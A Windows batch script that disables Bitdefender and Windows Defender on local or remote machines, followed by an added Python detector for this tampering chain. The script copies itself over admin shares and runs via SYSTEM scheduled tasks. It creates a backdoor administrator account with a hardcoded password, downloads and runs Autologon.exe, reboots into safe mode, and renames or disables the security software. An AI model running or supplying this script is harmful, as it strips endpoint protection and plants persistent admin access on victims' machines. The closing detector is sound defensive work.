REM - Author: Roberto Franceschetti
REM - Usage - to disable AV on local machine: C:\>Bitdefender-DisableAV-Remote.bat
REM - Usage - to disable AV on remote machine: C:\>Bitdefender-DisableAV-Remote.bat TargetComputerName (must be a hostname - IP won't work)

IF NOT [%1] == [] (GOTO Remote) ELSE (GOTO Local)

:Remote
rem - we are exploiting a remote computer - copy script to victim and schedule task to execute it
COPY "%~dp0Bitdefender-DisableAV-Remote.bat" \\%1\C$\windows\temp\Bitdefender-DisableAV-Remote.bat
powershell -command "& {$time = [DateTime]::Now.AddMinutes(1);$hourMinute=$time.ToString('HH:mm');SchTasks.exe /Create /s %1 /SC ONCE /TN 'DisableBitdefender' /TR 'C:\Windows\temp\BitdefenderCentral-DisableAV-Remote.bat' /ST $hourMinute /F /RU 'SYSTEM' /RL HIGHEST }"
GOTO :eof

:Local
@echo off
rem ===============part 1=============
rem create scheduled tasks
echo powershell -command "& {$time = [DateTime]::Now.AddMinutes(1);$hourMinute=$time.ToString('HH:mm');SchTasks.exe /Create /SC ONCE /TN 'DisableBitdefender-2' /TR 'C:\Windows\temp\DisableBitdefenderAV-2.bat' /ST $hourMinute /F /RU 'SYSTEM' /RL HIGHEST }" > c:\windows\temp\DisableBitdefenderAV-1.bat
echo powershell -command "& {$time = [DateTime]::Now.AddMinutes(2);$hourMinute=$time.ToString('HH:mm');SchTasks.exe /Create /SC ONCE /TN 'DisableBitdefender-3' /TR 'C:\Windows\temp\DisableBitdefenderAV-3.bat' /ST $hourMinute /F /RU 'SYSTEM' /RL HIGHEST }" >> c:\windows\temp\DisableBitdefenderAV-1.bat
echo powershell -command "& {$time = [DateTime]::Now.AddMinutes(3);$hourMinute=$time.ToString('HH:mm');SchTasks.exe /Create /SC ONCE /TN 'DisableBitdefender-4' /TR 'C:\Windows\temp\DisableBitdefenderAV-4.bat' /ST $hourMinute /F /RU 'SYSTEM' /RL HIGHEST }" >> c:\windows\temp\DisableBitdefenderAV-1.bat
echo powershell -command "& {$time = [DateTime]::Now.AddMinutes(4);$hourMinute=$time.ToString('HH:mm');SchTasks.exe /Create /SC ONCE /TN 'DisableBitdefender-5' /TR 'C:\Windows\temp\DisableBitdefenderAV-5.bat' /ST $hourMinute /F /RU 'SYSTEM' /RL HIGHEST }" >> c:\windows\temp\DisableBitdefenderAV-1.bat
echo powershell -command "& {$time = [DateTime]::Now.AddMinutes(5);$hourMinute=$time.ToString('HH:mm');SchTasks.exe /Create /SC ONCE /TN 'DisableBitdefender-6' /TR 'C:\Windows\temp\DisableBitdefenderAV-6.bat' /ST $hourMinute /F /RU 'SYSTEM' /RL HIGHEST }" >> c:\windows\temp\DisableBitdefenderAV-1.bat
echo powershell -command "& {$time = [DateTime]::Now.AddMinutes(6);$hourMinute=$time.ToString('HH:mm');SchTasks.exe /Create /SC ONCE /TN 'DisableBitdefender-7' /TR 'C:\Windows\temp\DisableBitdefenderAV-7.bat' /ST $hourMinute /F /RU 'SYSTEM' /RL HIGHEST }" >> c:\windows\temp\DisableBitdefenderAV-1.bat
echo powershell -command "& {$time = [DateTime]::Now.AddMinutes(7);$hourMinute=$time.ToString('HH:mm');SchTasks.exe /Create /SC ONCE /TN 'DisableBitdefender-8' /TR 'C:\Windows\temp\DisableBitdefenderAV-8.bat' /ST $hourMinute /F /RU 'SYSTEM' /RL HIGHEST }" >> c:\windows\temp\DisableBitdefenderAV-1.bat
echo powershell -command "& {$time = [DateTime]::Now.AddMinutes(8);$hourMinute=$time.ToString('HH:mm');SchTasks.exe /Create /SC ONCE /TN 'DisableBitdefender-9' /TR 'C:\Windows\temp\DisableBitdefenderAV-9.bat' /ST $hourMinute /F /RU 'SYSTEM' /RL HIGHEST }" >> c:\windows\temp\DisableBitdefenderAV-1.bat

rem ===============part 2=============
rem - We are running .bat locally - run the exploit
rem - create local admin account used to autologin on first safe boot
echo net user BitdefenderBounty "Bitdefender123" /ADD > c:\windows\temp\DisableBitdefenderAV-2.bat
echo net localgroup administrators BitdefenderBounty /add >> c:\windows\temp\DisableBitdefenderAV-2.bat
rem - add autologin registry entries for next reboot
echo powershell -command "& { iwr https://live.sysinternals.com/Autologon.exe -OutFile c:\windows\temp\Autologon.exe }" >> c:\windows\temp\DisableBitdefenderAV-2.bat
rem - Now configure the next reboot in safe mode and autologin

rem ===============part 3=============
echo c:\windows\temp\Autologon.exe -accepteula BitdefenderBounty . Bitdefender123 > c:\windows\temp\DisableBitdefenderAV-3.bat

rem ===============part 4=============
echo bcdedit /set {default} safeboot minimal > c:\windows\temp\DisableBitdefenderAV-4.bat

rem ===============part 0 main in safe mode=============
rem - create the batch file executed by the DisableBitdefender service after the safe reboot
rem - will rename ProgramFiles\Bitdefender folders/filesystem drivers, disable WinDefender
rem - will remove the safeboot/autologon entries and reboot
echo cd c:\windows\temp > c:\windows\temp\DisableBitdefenderAV.bat
echo ren "C:\Program Files\Bitdefender" "Bitdefender Disabled" >> c:\windows\temp\DisableBitdefenderAV.bat
echo ren "C:\Program Files\Bitdefender Agent" "Bitdefender Agent Disabled" >> c:\windows\temp\DisableBitdefenderAV.bat
echo ren "C:\Program Files\Common Files\Bitdefender" "Bitdefender Disabled" >> c:\windows\temp\DisableBitdefenderAV.bat
echo ren "C:\Program Files\Windows Defender" "Windows Defender Disabled" >> c:\windows\temp\DisableBitdefenderAV.bat
echo ren "C:\Program Files\Windows Defender Advanced Threat Protection" "Windows Defender Advanced Threat Protection Disabled" >> c:\windows\temp\DisableBitdefenderAV.bat
echo ren "C:\Program Files (x86)\Windows Defender" "Windows Defender Disabled" >> c:\windows\temp\DisableBitdefenderAV.bat
echo ren "C:\ProgramData\Bitdefender" "Bitdefender Disabled" >> c:\windows\temp\DisableBitdefenderAV.bat
echo ren "C:\ProgramData\Bitdefender Agent" "Bitdefender Agent Disabled" >> c:\windows\temp\DisableBitdefenderAV.bat
echo ren "C:\ProgramData\Bitdefender VPN" "Bitdefender VPN Disabled" >> c:\windows\temp\DisableBitdefenderAV.bat
echo sc config "BDAuxSrv" start=disabled >> c:\windows\temp\DisableBitdefenderAV.bat
echo sc config "UPDATESRV" start=disabled >> c:\windows\temp\DisableBitdefenderAV.bat
echo sc config "BDProtSrv" start=disabled >> c:\windows\temp\DisableBitdefenderAV.bat
echo sc config "bdredline" start=disabled >> c:\windows\temp\DisableBitdefenderAV.bat
echo sc config "VSSERV" start=disabled >> c:\windows\temp\DisableBitdefenderAV.bat
echo sc config "BdVpnService" start=disabled >> c:\windows\temp\DisableBitdefenderAV.bat
echo sc config WinDefend start=disabled >> c:\windows\temp\DisableBitdefenderAV.bat
echo timeout /t 10 >> c:\windows\temp\DisableBitdefenderAV.bat
echo net stop SAVService >> c:\windows\temp\DisableBitdefenderAV.bat
echo net stop hmpalertsvc >> c:\windows\temp\DisableBitdefenderAV.bat
echo timeout /t 10 >> c:\windows\temp\DisableBitdefenderAV.bat
echo ren "C:\Program Files\Bitdefender" "Bitdefender Disabled" >> c:\windows\temp\DisableBitdefenderAV.bat
echo reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /f /t REG_SZ /d "0" >> c:\windows\temp\DisableBitdefenderAV.bat
echo bcdedit /deletevalue {default} safeboot >> c:\windows\temp\DisableBitdefenderAV.bat
echo sc delete DisableBitdefender >> c:\windows\temp\DisableBitdefenderAV.bat
rem - echo pause >> c:\windows\temp\DisableBitdefenderAV.bat
echo shutdown /r /f /t 0 >> c:\windows\temp\DisableBitdefenderAV.bat

rem ===============part 5=============
rem - now create the Powershell script that will create a "DisableBitdefenderAV.exe" that will simply execute the DisableBitdefenderAV.bat batch file above:
rem - this is done as Windows 10 won't allow a service to run a .bat file, but a .exe will however run once just fine even if the service fails to start
echo @echo off > c:\windows\temp\DisableBitdefenderAV-5.bat
echo echo $source = @^^^" ^> c:\windows\temp\CreateService.txt >> c:\windows\temp\DisableBitdefenderAV-5.bat
echo echo using System; ^>^> c:\windows\temp\CreateService.txt >> c:\windows\temp\DisableBitdefenderAV-5.bat
echo echo class Hello { ^>^> c:\windows\temp\CreateService.txt >> c:\windows\temp\DisableBitdefenderAV-5.bat
echo echo static void Main() { ^>^> c:\windows\temp\CreateService.txt >> c:\windows\temp\DisableBitdefenderAV-5.bat
echo echo System.Diagnostics.Process.Start(^^^"C:\\Windows\\Temp\\DisableBitdefenderAV.bat^^^"); ^>^> c:\windows\temp\CreateService.txt >> c:\windows\temp\DisableBitdefenderAV-5.bat
echo echo } ^>^> c:\windows\temp\CreateService.txt >> c:\windows\temp\DisableBitdefenderAV-5.bat
echo echo } ^>^> c:\windows\temp\CreateService.txt >> c:\windows\temp\DisableBitdefenderAV-5.bat
echo echo ^^^"@ ^>^> c:\windows\temp\CreateService.txt >> c:\windows\temp\DisableBitdefenderAV-5.bat
echo echo Add-Type -TypeDefinition $source -Language CSharp -OutputAssembly ^^^"C:\Windows\Temp\DisableBitdefenderAV.exe^^^" ^>^> c:\windows\temp\CreateService.txt >> c:\windows\temp\DisableBitdefenderAV-5.bat

rem ===============part 6=============
echo ren C:\Windows\Temp\CreateService.txt CreateService.ps1 > c:\windows\temp\DisableBitdefenderAV-6.bat

rem ===============part 7=============
rem - now execute the powershell script to create the DisableBitdefenderAV.exe file and install it as a service:
echo powershell set-executionpolicy -executionpolicy bypass > c:\windows\temp\DisableBitdefenderAV-7.bat
echo powershell c:\windows\temp\CreateService.ps1 >> c:\windows\temp\DisableBitdefenderAV-7.bat

rem ===============part 8=============
echo sc create DisableBitdefender binpath="c:\windows\temp\DisableBitdefenderAV.exe" start=auto > c:\windows\temp\DisableBitdefenderAV-8.bat
rem - this entry will allow the DisableBitdefender service to run in Safeboot as well, otherwise it won't start:
echo reg add HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\DisableBitdefender /f /t REG_SZ /d "service" >> c:\windows\temp\DisableBitdefenderAV-8.bat
rem - now reboot... Safe mode will be activated and the DisableBitdefenderAV.exe service will run, calling the DisableBitdefenderAV.bat script, renaming the Bitdefender folders no longer protected by Tamper Protection
rem - pause

rem ===============part 9=============
echo shutdown /r /f /t 0 > c:\windows\temp\DisableBitdefenderAV-9.bat

CALL c:\windows\temp\DisableBitdefenderAV-1.bat
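The chain above leaves a recognisable trail in process-creation telemetry: a `bcdedit ... safeboot` change, a new key under `SafeBoot\Minimal`, a service whose binary lives in a temp folder, autologon setup, SYSTEM scheduled tasks pointing into temp, and `sc config ... start=disabled` against security services. The detector below is an added example for defenders, not part of the original script; its log format, regexes and the sample records are constructed assumptions, and it correlates stages per host because any single stage on its own is routine administration.

```python
import re
from collections import defaultdict

# One regex per stage of the safe-mode tampering chain. Written from the commands
# the batch file issues; how they appear in a given log product is an assumption.
STAGE_RULES = {
    "safeboot_set":          re.compile(r"\bbcdedit\b.*\s/set\b.*\bsafeboot\b", re.I),
    "safeboot_service_key":  re.compile(r"\breg\s+add\b.*\\SafeBoot\\Minimal\\", re.I),
    "service_from_temp":     re.compile(r"\bsc\s+create\b.*binpath=\"?[^\"]*\\temp\\", re.I),
    "autologon_setup":       re.compile(r"AutoAdminLogon|Autologon\.exe", re.I),
    "system_task_from_temp": re.compile(r"schtasks.*\\temp\\.*\s/RU\s+'?SYSTEM\b", re.I),
    "av_service_disabled":   re.compile(r"\bsc\s+config\b.*\bstart=\s*disabled\b", re.I),
}

# Constructed record layout (Sysmon Event ID 1 style, flattened to one line).
LOG_RE = re.compile(r"^host=(\S+)\s+image=(\S+)\s+cmdline=(.*)$")

def match_stages(cmdline):
    """Return the sorted names of every chain stage one command line matches."""
    return sorted(name for name, rx in STAGE_RULES.items() if rx.search(cmdline))

def scan(lines, min_stages=2):
    """Group stage hits by host and report hosts with >= min_stages distinct
    stages; a lone hit (an admin disabling one service) is too noisy to alert on."""
    per_host = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not a process-creation record; ignore
        host, _image, cmdline = m.groups()
        per_host[host].update(match_stages(cmdline))
    return {h: sorted(s) for h, s in per_host.items() if len(s) >= min_stages}

# Constructed sample records, not real telemetry: WS01 shows three stages of the
# chain, WS02 shows look-alike but benign administration.
SAMPLE_LOG = [
    r'host=WS01 image=C:\Windows\System32\bcdedit.exe cmdline=bcdedit /set {default} safeboot minimal',
    r'host=WS01 image=C:\Windows\System32\reg.exe cmdline=reg add HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\DisableBitdefender /f /t REG_SZ /d "service"',
    r'host=WS01 image=C:\Windows\System32\sc.exe cmdline=sc create DisableBitdefender binpath="c:\windows\temp\DisableBitdefenderAV.exe" start=auto',
    r'host=WS02 image=C:\Windows\System32\bcdedit.exe cmdline=bcdedit /enum {default}',
    r'host=WS02 image=C:\Windows\System32\sc.exe cmdline=sc query WinDefend',
]

if __name__ == "__main__":
    for host, stages in scan(SAMPLE_LOG).items():
        print(f"{host}: safe-mode AV tampering chain, stages={stages}")
```

In a real deployment the same per-host correlation should also add a time window, since the script spaces its stages one minute apart via scheduled tasks.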